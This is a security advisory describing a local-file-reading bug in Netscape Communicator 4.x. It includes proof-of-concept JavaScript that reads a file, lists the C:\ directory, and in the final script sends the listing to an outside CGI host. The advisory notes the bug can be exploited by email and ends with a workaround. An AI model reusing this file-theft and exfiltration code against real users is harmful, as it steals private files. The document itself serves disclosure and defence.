COMMAND

    Netscape Communicator 4.5

SYSTEMS AFFECTED

    Netscape Communicator 4.04, 4.5 for Win95, NT, Linux, MacOS

PROBLEM

    Georgi  Guninski  found  following.   There  is  a bug in Netscape
    Communicator 4.5 for Windows 95  and 4.05 for WinNT 4.0  (probably
    others) which allows reading files  from the user's computer.   It
    is not necessary  the file name  to be known,  because directories
    may  be  browsed.   The  contents  of  the  file may be sent to an
    arbitrary host.   In order this  to work, you  need both Java  and
    Javascript enabled.  The bug  may be  exploited by  email message.
    Demonstration is available at:

        http://www.geocities.com/ResearchTriangle/1711/b6.html

    The Javascript code is:

        sl=window.open("wysiwyg://1/file:///C|/");
        sl2=sl.window.open();
        sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
        file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
        java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
        (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

    This is  similar to  the Java  sandbox concept.   Local and signed
    content  are  "trusted"  and  can  do  whatever they like, whereas
    remotely loaded content are "untrusted" and aren't supposed to  be
    able to perform certain operations.

    Terence Christopher Haddock added  following.  This security  hole
    is not limited to knowing a specific file name, it can be used  to
    list the  contents of  a directory,  which I  believe is much more
    insidious.  This script can send a list of the files in the user's
    root directory under windows (Simple to modify it for UNIX):

        sl=window.open("wysiwyg://1/file://C|/");
        sl2=sl.window.open();
        sl2.location="javascript:"+
        "b=\"Here is the files in your root directory:\";"+
        "var f=new java.io.file(\"C:\\\\\");"+
        "var files=f.list();"+
        "for (var x=0;x<files.length;x++){"+
        "b+=files[x]+\"\n\""+
        "};"+
        "alert(b);";

    Using  a  search  algorithm  the  script could search for specific
    files  by  running  this  recursively.   The  only problem (from a
    hacker's perspective, a  good thing from  our perspective) is  all
    of the windows  it would open.   If a way  could be worked  around
    this,  this  script  could  run  without  a  user even knowing it,
    searching the user's directories and reporting them to a server.

    Also, you may try following (by Trev):

        http://www.kics.bc.ca/~trev/cgi-bin/test.html
        http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html

    And if you wish, it can even read your directory structure  (works
    for Win, but Unix should be straightforward):

        //slight change of Trev's script:
        <SCRIPT>
        alert("List your files in C:\\ and it will be sent to a cgi script.");

        sl=window.open("wysiwyg://1/file:///C|/");
        sl2=sl.window.open();
        sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new
        java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length)
        {b += fl[i]+\"\\\\n\";
        i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";

        </SCRIPT>

SOLUTION

    Disable Javascript and Java.  It appears that the only version  of
    Netscape 4.x  that *ISN'T*  vulnerable is  4.08 (both  windoze and
    unix).   It  gives  the  "security.checkread"  error.   All  other
    versions faithfully reported back the file contents many times.